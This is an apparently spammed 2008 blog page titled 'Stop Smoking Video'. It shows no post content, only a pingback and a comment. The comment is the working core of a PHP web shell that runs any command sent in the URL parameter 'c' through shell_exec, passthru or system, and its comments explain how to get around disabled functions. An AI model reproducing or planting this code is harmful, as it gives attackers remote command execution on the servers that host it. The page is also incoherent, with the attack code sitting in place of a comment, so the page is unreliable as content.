• Home |
  • About |
  • Archives |

Sat 5 Apr 2008

Stop Smoking Video

Posted by Cristian under Great Ideas , Interesting
 

 

2 Responses to “Stop Smoking Video”

  1. Smoking » Stop Smoking Video Says:
    April 5th, 2008 at 9:49 am

    […] Tips To Read wrote an interesting post today on Stop Smoking VideoHere’s a quick excerpt […]

  2. Frederick Busnon Says:
    April 7th, 2008 at 10:51 pm

    “;

    //Love tags organize the shit greatly.
    echo”";

    //Umm basicly just makes it easier so i don’t have to type…
    //$_GET[’m'] = ‘1′… $_GET[’m'] = ‘2′ with if statements.
    //Instead just use case”1″ case”2″ etc.

    switch($_GET[’m']) {

    //If shell.php?m=1 then execute what ever command is under c=
    //E.G. shell.php?m=1&c=ls -la

    case”1″:
    $cmd = shell_exec($_GET[’c']);
    echo”$cmd”;
    break;

    //Same as above but with passthru incase shell_exec() is dissalowed
    in…
    //The php.ini

    case”2″:
    $cmd = passthru($_GET[’c']);
    echo”$cmd”;
    break;

    //Same as both above but incase shell_exec() & passthru() are
    disabled…
    // In php.ini

    case”3″:
    $cmd = system($_GET[’c']);
    echo”$cmd”;
    break;

    //END SWITCH
    }

    //End tags
    echo”";

    //End File
    ?>

1 Star2 Stars3 Stars4 Stars5 Stars (4 votes, average: 4.75 out of 5)
Loading ... Loading ...

Leave a Reply

Archived Entry

  • Post Date :
  • Saturday, Apr 5th, 2008 at 7:41 am
  • Category :
  • Great Ideas and Interesting
  • Do More :
  • You can leave a response, or trackback from your own site.

My favourite links

  • Digital Photography Tips
  • Funny News
  • Motorcycle Tips
  • Remove Adware
  • Snomobile Tips
  • Wines Tips
  • World of Warcraft Tips

© copyright 2007 www.tipstoread.com